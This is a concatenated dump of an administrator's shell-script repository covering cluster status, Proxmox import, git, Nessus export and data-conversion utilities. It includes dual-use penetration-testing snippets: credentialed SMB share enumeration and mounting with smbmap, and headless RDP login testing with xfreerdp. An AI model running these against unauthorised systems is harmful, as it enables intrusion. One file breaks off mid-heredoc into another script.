$FENCING_RESOURCE_STATUS $RUNNING_ON_NODE $FENCING_RESOURCE_TYPE 171 | done < <(pcs stonith show | sort) 172 | else 173 | echo "${_RED_}[WARNING] No S.T.O.N.I.T.H. 
devices are configured.${_RESET_}" 174 | fi 175 | 176 | if [[ $RGS == true ]] ; then 177 | RESOURCE_GROUP=$1 178 | 179 | echo 180 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 181 | echo "${_CYAN_}$CLUSTER_NAME - RESOURCES STATUS (GROUP: $RESOURCE_GROUP)${_RESET_}" 182 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 183 | 184 | RGS=$(pcs resource group list | grep $RESOURCE_GROUP) 185 | 186 | if [[ $RGS != "" ]] ; then 187 | printf "%-20s%-12s%-20s%-10s\n" RESOURCE STATUS 'RUNNING ON NODE' TYPE 188 | 189 | for RESOURCE in $(pcs resource group list | grep $RESOURCE_GROUP | cut -d':' -f 2) ; do 190 | RESOURCE_ROW=$(pcs status | grep -v 'Resource Group' | grep -v '*' | grep $RESOURCE) 191 | RESOURCE_NAME=$(echo $RESOURCE_ROW | awk '{ print $1 }') 192 | RESOURCE_STATUS=$(echo $RESOURCE_ROW | awk '{ print $3 }') 193 | RESOURCE_STATUS=${RESOURCE_STATUS^^} 194 | RESOURCE_TYPE=$(echo $RESOURCE_ROW | awk -F "[()]" '{ print $2 }') 195 | 196 | if [[ $RESOURCE_STATUS == "STARTED" ]] ; then 197 | RUNNING_ON_NODE=$(crm_resource --resource $RESOURCE --locate | awk '{print $NF}') 198 | RESOURCE_STATUS="${_GREEN_}STARTED${_RESET_}" 199 | elif [[ $RESOURCE_STATUS == "STOPPED" ]] ; then 200 | RUNNING_ON_NODE="-" 201 | RESOURCE_STATUS="${_RED_}STOPPED${_RESET_}" 202 | fi 203 | 204 | if [[ $RUNNING_ON_NODE == $HOSTNAME ]] ; then 205 | RUNNING_ON_NODE="${RUNNING_ON_NODE}<" 206 | fi 207 | 208 | printf "%-20s%-23s%-20s%-17s\n" $RESOURCE_NAME $RESOURCE_STATUS $RUNNING_ON_NODE $RESOURCE_TYPE 209 | done 210 | else 211 | echo "${_RED_}[ERROR] Resource group \"$RESOURCE_GROUP\" does not exist.${_RESET_}" 212 | fi 213 | else 214 | echo 215 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 216 | echo "${_CYAN_}$CLUSTER_NAME - RESOURCE GROUPS STATUS${_RESET_}" 217 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 218 | 219 | printf "%-20s%-12s%-20s%-10s\n" 'RESOURCE GROUP' STATUS 'RUNNING ON NODE' OTHER 220 | 221 | while read -r GROUP_LIST_ROW ; do 222 | GROUP=$(echo $GROUP_LIST_ROW | cut -d ':' -f 1) 223 | 224 | RESOURCE_COUNT=0 225 | RESOURCE_STARTED_COUNT=0 226 | RESOURCE_STOPPED_COUNT=0 227 | RESOURCE_UNMANAGED_COUNT=0 228 | GROUP_STATUS="" 229 | UNMANAGED_STATUS="" 230 | 231 | for RESOURCE in $(echo $GROUP_LIST_ROW | cut -d ':' -f 2-) ; do 232 | if [[ "$(pcs status resources | grep $RESOURCE | grep -c Started)" -eq 1 ]] ; then 233 | (( RESOURCE_STARTED_COUNT++ )) 234 | elif [[ "$(pcs status resources | grep $RESOURCE | grep -c Stopped)" -eq 1 ]] ; then 235 | (( RESOURCE_STOPPED_COUNT++ )) 236 | fi 237 | 238 | if [[ "$(pcs status resources | grep $RESOURCE | grep -c '(unmanaged)')" -eq 1 ]] ; then 239 | (( RESOURCE_UNMANAGED_COUNT++ )) 240 | fi 241 | 242 | (( RESOURCE_COUNT++ )) 243 | done 244 | 245 | if [[ $RESOURCE_STARTED_COUNT -eq $RESOURCE_COUNT ]] ; then 246 | GROUP_STATUS="${_GREEN_}STARTED${_RESET_}" 247 | elif [[ $RESOURCE_STOPPED_COUNT -eq $RESOURCE_COUNT ]] ; then 248 | GROUP_STATUS="${_RED_}STOPPED${_RESET_}" 249 | else 250 | GROUP_STATUS="${_YELLOW_}PARTIAL${_RESET_}" 251 | fi 252 | 253 | if [[ $RESOURCE_UNMANAGED_COUNT -eq $RESOURCE_COUNT ]] ; then 254 | UNMANAGED_STATUS="${_MAGENTA_}unmanaged${_RESET_}" 255 | elif [[ $RESOURCE_UNMANAGED_COUNT -gt 0 ]] && [[ $RESOURCE_UNMANAGED_COUNT -lt $RESOURCE_COUNT ]] ; then 256 | 
UNMANAGED_STATUS="${_MAGENTA_}partially_unmanaged${_RESET_}" 257 | fi 258 | 259 | RUNNING_ON_NODE=$((crm_resource --resource $GROUP --locate | head -1 | cut -s -d ':' -f 2) 2> /dev/null) 260 | RUNNING_ON_NODE=$(echo $RUNNING_ON_NODE | tr -d ' ') 261 | 262 | if [[ $RUNNING_ON_NODE == $HOSTNAME ]] ; then 263 | RUNNING_ON_NODE=">${RUNNING_ON_NODE}" 264 | else 265 | RUNNING_ON_NODE=" ${RUNNING_ON_NODE}" 266 | fi 267 | 268 | printf "%-20s%-23s%-20s%-17s\n" $GROUP $GROUP_STATUS "${RUNNING_ON_NODE}" $UNMANAGED_STATUS 269 | done < <(pcs resource group list | sort) 270 | fi 271 | 272 | echo 273 | 274 | -------------------------------------------------------------------------------- /System_Administration/Clusters/RedHat_HA_Cluster/prompt.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | # This script shows the RHEL 7 cluster name in the shell prompt. 4 | # Needs to be saved as: /etc/profile.d/prompt.sh 5 | 6 | CLUSTER_NAME=$(pcs config 2> /dev/null | grep 'Cluster Name:' | awk '{print $3}') 7 | 8 | if [[ -z $CLUSTER_NAME ]] ; then 9 | test "$SHELL" == "/bin/bash" && PS1='[\u@\h \w]\$ ' 10 | else 11 | test "$SHELL" == "/bin/bash" && PS1='[$CLUSTER_NAME \u@\h \w]\$ ' 12 | fi 13 | 14 | -------------------------------------------------------------------------------- /System_Administration/Virtualization/proxmox_import_ova.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # Modified by: Giuseppe Patania (pataniag@gmail.com) 5 | # 6 | # Name: proxmox_import_ova.sh 7 | # 8 | # Description: A script that helps importing an Open Virtual Appliance (OVA) 9 | # into ProxMox. A new VM gets created. 10 | # 11 | # Usage: ./proxmox_import_ova.sh --storages 12 | # ./proxmox_import_ova.sh 13 | # 14 | # 15 | # --TODO-- 16 | # - improve and optimize code 17 | # - better checks for command line parameters 18 | # 19 | # 20 | ################################################################################ 21 | 22 | 23 | # VARIABLES -------------------------------------------------------------------- 24 | 25 | STORAGE="VM_STORAGE" 26 | 27 | 28 | # FUNCTIONS -------------------------------------------------------------------- 29 | 30 | command_exists() { 31 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 32 | } 33 | 34 | usage() { 35 | echo "./proxmox_import_ova.sh --storages" 36 | echo "./proxmox_import_ova.sh " 37 | } 38 | 39 | 40 | # CHECKS ----------------------------------------------------------------------- 41 | 42 | declare -a CMDS=( 43 | "awk" 44 | "mktemp" 45 | "pvesh" 46 | "qm" 47 | "tail" 48 | ); 49 | 50 | for CMD in ${CMDS[@]} ; do 51 | command_exists $CMD 52 | done 53 | 54 | 55 | # MAIN ------------------------------------------------------------------------- 56 | 57 | if [[ "$#" -eq 0 ]] ; then 58 | usage 59 | 60 | exit 1 61 | elif [[ "$#" -eq 1 && "$1" == "--storages" ]] ; then 62 | echo "Available storages in ProxMox cluster:" 63 | 64 | pvesh get /storage --noborder --noheader 65 | elif [[ "$#" -eq 2 ]] ; then 66 | OVA=$1 67 | STORAGE=$2 68 | 69 | if [[ ! -f "$OVA" ]] ; then 70 | echo "Error! 
OVA file not found: $OVA" 71 | echo 72 | 73 | exit 1 74 | fi 75 | 76 | TFILE1=$(mktemp) 77 | TFILE2=$(mktemp) 78 | 79 | pvesh get /nodes --noborder --noheader | awk '{ print $1 }' > $TFILE1 80 | 81 | for NODE in $(cat $TFILE1) ; do 82 | pvesh get /nodes/$NODE/qemu --noborder --noheader | awk '{ print $2 }' >> $TFILE2 83 | done 84 | 85 | LATEST_VMID=$(sort -h $TFILE2 | tail -1) 86 | NEW_VMID=$((LATEST_VMID+1)) 87 | 88 | echo "OVA file: $OVA" 89 | echo "Storage: $STORAGE" 90 | echo "Latest VMID: $LATEST_VMID" 91 | echo "New VMID: $NEW_VMID" 92 | echo "----" 93 | echo "Uncompressing OVA file..." 94 | 95 | tar xvf $OVA > $TFILE1 96 | 97 | echo "Importing OVF file..." 98 | 99 | OVF=$(echo $OVA | sed -e 's/.ova/.ovf/g') 100 | qm importovf $NEW_VMID "$OVF" "$STORAGE" 101 | 102 | echo "Deleting old files..." 103 | 104 | while read LINE ; do 105 | rm -f $LINE 106 | done < $TFILE1 107 | 108 | rm -f $TFILE1 $TFILE2 109 | 110 | exit 0 111 | else 112 | usage 113 | 114 | exit 1 115 | fi 116 | -------------------------------------------------------------------------------- /System_Administration/fix_locales.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | locale-gen en_US.UTF-8 4 | 5 | export LANGUAGE=en_US.UTF-8 6 | export LANG=en_US.UTF-8 7 | export LC_ALL=en_US.UTF-8 8 | 9 | locale-gen en_US.UTF-8 10 | 11 | dpkg-reconfigure locales 12 | -------------------------------------------------------------------------------- /System_Administration/mount_smb_shares_with_auth.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: mount_smb_shares_with_auth.sh 6 | # 7 | # Description: Given valid credentials, this script lists and mounts all the 8 | # readable(/writable) shares from a given SMB server. 9 | # 10 | # Usage: ./mount_smb_shares_with_auth.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | USERNAME='testuser' 23 | PASSWORD='Passw0rd!' 24 | DOMAIN='TEST' 25 | HOSTNAME='dc.test.local' 26 | MOUNTDIR=/tmp/CIFS 27 | 28 | 29 | # FUNCTIONS -------------------------------------------------------------------- 30 | 31 | command_exists() { 32 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! 
Command not found: $1" 1>&2 ; exit 1 ; } 33 | } 34 | 35 | 36 | # CHECKS ----------------------------------------------------------------------- 37 | 38 | declare -a CMDS=( 39 | "mount.cifs" 40 | "smbmap" 41 | ); 42 | 43 | for CMD in ${CMDS[@]} ; do 44 | command_exists $CMD 45 | done 46 | 47 | 48 | # MAIN ------------------------------------------------------------------------- 49 | 50 | echo "Username: $USERNAME" 51 | echo "Domain: $DOMAIN" 52 | echo "Host: $HOSTNAME" 53 | echo 54 | echo "Shares found on \"$HOSTNAME\":" 55 | 56 | #enum4linux -u $USERNAME -p $PASSWORD -w $DOMAIN -S $HOSTNAME | grep ^'//' | grep -vF '[E]' 57 | 58 | for SHARE in $(smbmap -u $USERNAME -p $PASSWORD -d $DOMAIN -H $HOSTNAME | grep 'READ' | awk '{ print $1 }') ; do 59 | echo "//$HOSTNAME/$SHARE" 60 | 61 | S=$MOUNTDIR/$SHARE 62 | 63 | umount -q $S 64 | mkdir -p $S 65 | 66 | mount.cifs -o ro,user=$USERNAME,password=$PASSWORD,domain=$DOMAIN "//$HOSTNAME/$SHARE" $S 67 | done 68 | 69 | echo 70 | echo "Mounted shares can be found in:" 71 | echo $MOUNTDIR 72 | echo 73 | -------------------------------------------------------------------------------- /System_Administration/pip_upgrade_pkgs.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | for PKG in $(pip freeze | cut -d'=' -f1) ; do 4 | pip install $PKG 5 | done 6 | 7 | for PKG in $(pip3 freeze | cut -d'=' -f1) ; do 8 | pip3 install $PKG 9 | done 10 | 11 | -------------------------------------------------------------------------------- /System_Administration/prepare_kali.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: prepare_kali.sh 6 | # 7 | # Description: A script that installs and configures useful packages on a 8 | # minimal Kali Linux installation. 9 | # 10 | # Usage: ./prepare_kali.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | OPENVAS_USER='user' 23 | OPENVAS_PASS='password' 24 | 25 | 26 | # MAIN ------------------------------------------------------------------------- 27 | 28 | cat > /etc/apt/sources.list.d/custom.list </dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 34 | } 35 | 36 | 37 | # CHECKS ----------------------------------------------------------------------- 38 | 39 | declare -a CMDS=( 40 | "ccrypt" 41 | ); 42 | 43 | for CMD in ${CMDS[@]} ; do 44 | command_exists $CMD 45 | done 46 | 47 | 48 | # MAIN ------------------------------------------------------------------------- 49 | 50 | apt list --installed | grep -vF 'Listing...' 
| cut -d'/' -f1 > /etc/INSTALLED_PACKAGES 51 | 52 | echo "Directories to backup:" 53 | echo "${DIRS_TO_BACKUP[@]}" | tr ' ' '\n' 54 | echo 55 | echo "Output file:" 56 | echo $OUT_FILE 57 | echo 58 | 59 | tar -czf - $(echo ${DIRS_TO_BACKUP[*]}) 2> /dev/null | ccrypt > $OUT_FILE 60 | 61 | -------------------------------------------------------------------------------- /System_Administration/snippets.txt: -------------------------------------------------------------------------------- 1 | # execute a locally defined function on a remote host via SSH 2 | function foo() 3 | { 4 | date 5 | uptime 6 | hostname 7 | } 8 | typeset -f | ssh user@remotehost "$(cat); foo" 9 | 10 | 11 | 12 | # find the longest line in a text file 13 | egrep -n "^.{$(wc -L < file.txt)}$" file.txt | sed 's/:/ -> /' 14 | 15 | 16 | 17 | # find all the strings with length equal or smaller than a given value in a text file 18 | awk 'length($1) <= 12 { print $1 }' file.txt 19 | 20 | 21 | 22 | # find the 10 largest directories starting from / 23 | du -hsx -- /* | sort -rh | head -10 24 | 25 | 26 | 27 | # [WINDOWS] realign Domain Controllers after ZeroLogon exploitation 28 | - Stop/Disable Kerberos Distribution Center 29 | - Reboot the server 30 | - Run the following command: 31 | netdom resetpwd /server:dc01.example.net /userd:example.net\administrator /passwordd:******** 32 | - Reboot the server 33 | - Enable KDC and start the service 34 | 35 | 36 | 37 | # test RDP login with XFreeRDP without using a graphical environment (dummy X is necessary) 38 | Xvfb :1 & 39 | export DISPLAY=:1 40 | xfreerdp /log-level:OFF --ignore-certificate --authonly -u $USERNAME -p $PASSWORD $HOST 41 | if [[ $? -eq 0 ]] ; then 42 | echo -n "$HOST: OK" 43 | fi 44 | -------------------------------------------------------------------------------- /Utilities/free_buffer_cache.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | echo '==== BEFORE ====' 4 | free 5 | sync 6 | echo 3 > /proc/sys/vm/drop_caches 7 | echo '==== AFTER ====' 8 | free 9 | 10 | -------------------------------------------------------------------------------- /Utilities/git_list_repos.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: git_list_repos.sh 6 | # 7 | # Description: Given a directory that contains a lot of nested directories with 8 | # many GIT projects, this script lists all the projects' 9 | # directories with their relative GIT project's remote URL. 10 | # 11 | # Usage: ./git_list_repos.sh 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # VARIABLES -------------------------------------------------------------------- 22 | 23 | GIT_BASE_DIR=/usr/local/src/GIT 24 | 25 | 26 | # FUNCTIONS -------------------------------------------------------------------- 27 | 28 | command_exists() { 29 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! 
Command not found: $1" 1>&2 ; exit 1 ; } 30 | } 31 | 32 | 33 | # CHECKS ----------------------------------------------------------------------- 34 | 35 | declare -a CMDS=( 36 | "git" 37 | ); 38 | 39 | for CMD in ${CMDS[@]} ; do 40 | command_exists $CMD 41 | done 42 | 43 | 44 | # MAIN ------------------------------------------------------------------------- 45 | 46 | CUR_DIR=$(pwd) 47 | 48 | for DIR in $(find $GIT_BASE_DIR -name ".git" | sed -e 's/\/.git//g' | sort) ; do 49 | cd $DIR 50 | 51 | URL=$(git remote -v | grep fetch | awk '{print $2}') 52 | 53 | echo "DIR: ${DIR}" 54 | echo "URL: ${URL}" 55 | 56 | echo 57 | done 58 | 59 | cd $CUR_DIR 60 | 61 | -------------------------------------------------------------------------------- /Utilities/git_update_repos.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: git_update_repos.sh 6 | # 7 | # Description: Given a directory that contains a lot of nested directories with 8 | # many GIT projects, this script updates all the GIT projects' code 9 | # to the latest version. 10 | # 11 | # Usage: ./git_update_repos.sh 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # VARIABLES -------------------------------------------------------------------- 22 | 23 | GIT_BASE_DIR=/usr/local/src/GIT 24 | 25 | 26 | # FUNCTIONS -------------------------------------------------------------------- 27 | 28 | command_exists() { 29 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 30 | } 31 | 32 | 33 | # CHECKS ----------------------------------------------------------------------- 34 | 35 | declare -a CMDS=( 36 | "git" 37 | ); 38 | 39 | for CMD in ${CMDS[@]} ; do 40 | command_exists $CMD 41 | done 42 | 43 | 44 | # MAIN ------------------------------------------------------------------------- 45 | 46 | CUR_DIR=$(pwd) 47 | 48 | for DIR in $(find $GIT_BASE_DIR -name ".git" | sed -e 's/\/.git//g' | sort) ; do 49 | cd $DIR 50 | 51 | PROJ=$(git remote -v | head -n1 | awk '{print $2}' | sed -e 's,.*:\(.*/\)\?,,' -e 's/\.git$//') 52 | 53 | echo "---- $PROJ" 54 | 55 | git pull 56 | 57 | echo 58 | done 59 | 60 | cd $CUR_DIR 61 | 62 | -------------------------------------------------------------------------------- /Utilities/greenpass_qr_decoder.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Convert an EU Digital COVID Certificate ("Green Pass") QR CODE to text and show its contents. 4 | # 5 | # TODO: 6 | # - convert binary encoded strings 7 | # 8 | # https://git.gir.st/greenpass.git/blob_plain/master:/greenpass.py 9 | 10 | QRCODE=$1 11 | 12 | if [ "$#" -ne 1 ]; then 13 | echo "Usage: ./greenpass_qr_decoder.sh <QR_CODE_IMAGE>" 14 | exit 1 15 | fi 16 | 17 | if [[ ! -f ${QRCODE} ]] ; then 18 | echo "Image file \"${QRCODE}\" not found." 
19 | exit 1 20 | fi 21 | 22 | #sudo pip3 install base45 cbor2 23 | cd /tmp || exit 1 24 | zbarimg "${QRCODE}" > /tmp/pass.txt 25 | sed -e 's/QR-Code:HC1://' < /tmp/pass.txt > /tmp/pass2.txt 26 | base45 --decode < /tmp/pass2.txt > /tmp/pass2.zz 27 | zlib-flate -uncompress < /tmp/pass2.zz > /tmp/pass2.bin 28 | python3 -m cbor2.tool --pretty < /tmp/pass2.bin > /tmp/pass2.dec 29 | cat /tmp/pass2.dec 30 | 31 | rm -f /tmp/pass.txt /tmp/pass2.txt /tmp/pass2.zz /tmp/pass2.bin /tmp/pass2.dec 32 | -------------------------------------------------------------------------------- /Utilities/magnet2torrent.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: magnet2torrent.sh 6 | # 7 | # Description: A script that gets a Magnet link as input and returns a valid 8 | # .torrent file as output. You must be able to connect to the 9 | # BitTorrent network to use this tool. 10 | # 11 | # Usage: ./magnet2torrent.sh '<MAGNET_LINK>' <OUTPUT_DIR> 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # VARIABLES -------------------------------------------------------------------- 22 | 23 | MAGNET=$1 24 | OUTDIR=$2 25 | 26 | 27 | # FUNCTIONS -------------------------------------------------------------------- 28 | 29 | command_exists() { 30 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 31 | } 32 | 33 | 34 | # CHECKS ----------------------------------------------------------------------- 35 | 36 | declare -a CMDS=( 37 | "aria2c" 38 | ); 39 | 40 | for CMD in ${CMDS[@]} ; do 41 | command_exists $CMD 42 | done 43 | 44 | if [[ "$#" -ne 2 ]] ; then 45 | echo "Usage: ./magnet2torrent.sh '<MAGNET_LINK>' <OUTPUT_DIR>" 46 | 47 | exit 1 48 | fi 49 | 50 | 51 | # MAIN ------------------------------------------------------------------------- 52 | 53 | if [[ ! -d ${OUTDIR} ]] ; then 54 | mkdir -p ${OUTDIR} 55 | fi 56 | 57 | aria2c -d ${OUTDIR} --bt-metadata-only=true --bt-save-metadata=true --listen-port=6881 "${MAGNET}" 58 | 59 | -------------------------------------------------------------------------------- /Utilities/mysql2csv.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: mysql2csv.sh 6 | # 7 | # Description: A script that reads all the "INSERT" queries from a MySQL dump 8 | # file and saves the records in a CSV file ("dump_sql.csv"). 9 | # The result may be a bit messy but is easy to grep and parse. 10 | # 11 | # Usage: ./mysql2csv.sh <MYSQL_DUMP_FILE> 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # VARIABLES -------------------------------------------------------------------- 22 | 23 | SQL=$1 24 | 25 | 26 | # FUNCTIONS -------------------------------------------------------------------- 27 | 28 | command_exists() { 29 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! 
Command not found: $1" 1>&2 ; exit 1 ; } 30 | } 31 | 32 | 33 | # CHECKS ----------------------------------------------------------------------- 34 | 35 | declare -a CMDS=( 36 | "dos2unix" 37 | "gawk" 38 | ); 39 | 40 | for CMD in ${CMDS[@]} ; do 41 | command_exists $CMD 42 | done 43 | 44 | if [[ "$#" -ne 1 ]] ; then 45 | echo "Usage: ./mysql2csv.sh " 46 | 47 | exit 1 48 | fi 49 | 50 | 51 | # MAIN ------------------------------------------------------------------------- 52 | 53 | cat $SQL | dos2unix | gawk ' 54 | BEGIN { 55 | table = "dump_sql"; 56 | sql = 1 57 | } 58 | 59 | { 60 | if ($0 ~ "^INSERT INTO ") { 61 | sql = 0 62 | } 63 | else if ($0 ~ "^DROP TABLE IF EXISTS") { 64 | table = gensub(/DROP TABLE IF EXISTS `(.+)`;/, "\\1", "g" $0); 65 | sql = 1 66 | } 67 | else { 68 | sql = 1 69 | } 70 | 71 | if (sql == 1) { 72 | print > table".sql"; 73 | } 74 | else { 75 | n = split($0, a, /(^INSERT INTO `[^`]*` VALUES \()|(\),\()|(\);$)/) 76 | 77 | for(i=1;i<=n;i++) { 78 | len = length(a[i]) 79 | if (len > 0) { 80 | data = a[i] 81 | print data > table".csv"; 82 | } 83 | } 84 | } 85 | } 86 | 87 | END {} 88 | ' 89 | 90 | -------------------------------------------------------------------------------- /Utilities/nessus_massive_export.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: nessus_massive_export.sh 6 | # 7 | # Description: When working with Nessus vulnerability scanner, if you have a 8 | # lot of scans in a folder, it takes a boringly long time to 9 | # download all the exports by hand. 10 | # This scripts lets you download the exports of all the scans in 11 | # a folder in just one shot. 12 | # 13 | # Usage: ./nessus_massive_export.sh [FOLDER_ID] 14 | # 15 | # Notes: Tested on Nessus Professional 8.5.1. 16 | # It may not work with older versions. 17 | # 18 | # 19 | # --TODO-- 20 | # - make it work with older versions 21 | # - do checks when there are no folders or no scans in a folder 22 | # - do checks on potential server timeouts and longer time to sleep 23 | # 24 | # 25 | ################################################################################ 26 | 27 | 28 | # VARIABLES -------------------------------------------------------------------- 29 | 30 | HOSTADDR="192.168.1.34" # the IP address of your Nessus scanner 31 | HOSTPORT="8834" # the TCP port of your Nessus scanner (default: 8834) 32 | USERNAME="nessus_user" 33 | PASSWORD='nessus_password' 34 | 35 | TMPDIR="/tmp/.nme" # directory that will contain temporary files 36 | REPORTSDIR="${TMPDIR}/reports" # directory that will contain XML ".nessus" files exported from Nessus 37 | SLEEPSEC=10 # seconds to wait to let Nessus generate the export file 38 | UA="cURL/7.65.3" # custom user agent 39 | 40 | 41 | # FUNCTIONS -------------------------------------------------------------------- 42 | 43 | command_exists() { 44 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! 
Command not found: $1" 1>&2 ; exit 1 ; } 45 | } 46 | 47 | 48 | # CHECKS ----------------------------------------------------------------------- 49 | 50 | declare -a CMDS=( 51 | "bc" 52 | "column" 53 | "curl" 54 | "gunzip" 55 | "gzip" 56 | "nc" # "OpenBSD rewrite of netcat" is required (pkg: netcat-openbsd) 57 | "jq" 58 | "jsonlint" # (pkg: python3-demjson) 59 | "wc" 60 | ); 61 | 62 | for CMD in ${CMDS[@]} ; do 63 | command_exists $CMD 64 | done 65 | 66 | 67 | # MAIN ------------------------------------------------------------------------- 68 | 69 | [[ $DEBUG -ne 0 ]] && set -x 70 | 71 | if [[ "$#" -ge 2 ]] ; then 72 | echo "./nessus_massive_export.sh [FOLDER_ID]" 73 | echo 74 | 75 | exit 1 76 | fi 77 | 78 | cat /dev/null | nc -w 3 -n -N ${HOSTADDR} ${HOSTPORT} &> /dev/null 79 | 80 | if [[ $? -ne 0 ]] ; then 81 | echo "TCP port ${HOSTPORT} at host ${HOSTADDR} seems to be closed. Quitting..." 82 | echo 83 | 84 | exit 1 85 | fi 86 | 87 | L1=$(echo -n "${USERNAME}" | wc -m) 88 | L2=$(echo -n "${PASSWORD}" | wc -m) 89 | CL=$(echo "$L1+$L2+29" | bc) 90 | 91 | AUTH=$(curl -s -k -X $"POST" \ 92 | -H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $"Referer: https://${HOSTADDR}:${HOSTPORT}/" -H $"Content-Type: application/json" -H $"Content-Length: $CL" -H $"Connection: close" \ 93 | --data-binary $"{\"username\":\"${USERNAME}\",\"password\":\"${PASSWORD}\"}" \ 94 | $"https://${HOSTADDR}:${HOSTPORT}/session" | jsonlint -f | grep token | awk '{ print $4 }' | tr -d '"') 95 | 96 | if [[ -z "$AUTH" ]] ; then 97 | echo "Authentication error for user \"${USERNAME}\"! Quitting..." 98 | echo 99 | 100 | exit 1 101 | fi 102 | 103 | mkdir -p $TMPDIR 104 | 105 | curl -s -k -X $"GET" \ 106 | -H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $'Referer: https://10.70.80.10:${HOSTPORT}/' -H $"Content-Type: application/json" -H $"X-Cookie: token=${AUTH}" -H $"Connection: close" \ 107 | $"https://${HOSTADDR}:${HOSTPORT}/server/properties" -o $TMPDIR/properties.gz 108 | 109 | gzip -t $TMPDIR/properties.gz 2> /dev/null 110 | 111 | if [[ $? -eq 0 ]] ; then 112 | gunzip -q --synchronous $TMPDIR/properties.gz 113 | else 114 | mv $TMPDIR/properties.gz $TMPDIR/properties 115 | fi 116 | 117 | VERSION=$(cat $TMPDIR/properties | jq -M '.nessus_type, .server_version' | tr -d '\n' | sed -e 's/""/ /g' | tr -d '"') 118 | MAJOR_VERSION=$(echo $VERSION | cut -d'.' -f1) 119 | 120 | rm -f $TMPDIR/properties 121 | 122 | echo "Scanner version: ${VERSION}" 123 | echo " Scanner URL: https://${HOSTADDR}:${HOSTPORT}/" 124 | echo " AUTH token: ${AUTH}" 125 | 126 | if [[ "$#" -eq 0 ]] ; then 127 | curl -s -k -X $"GET" \ 128 | -H $"Host: ${HOSTADDR}:${HOSTPORT}" -H $"${UA}" -H $"Accept: */*" -H $"Accept-Language: en-US,en;q=0.5" -H $"Accept-Encoding: gzip, deflate" -H $'Referer: https://10.70.80.10:${HOSTPORT}/' -H $"Content-Type: application/json" -H $"X-Cookie: token=${AUTH}" -H $"Connection: close" \ 129 | $"https://${HOSTADDR}:${HOSTPORT}/folders" -o $TMPDIR/folders.gz 130 | 131 | gzip -t $TMPDIR/folders.gz 2> /dev/null 132 | 133 | if [[ $? 
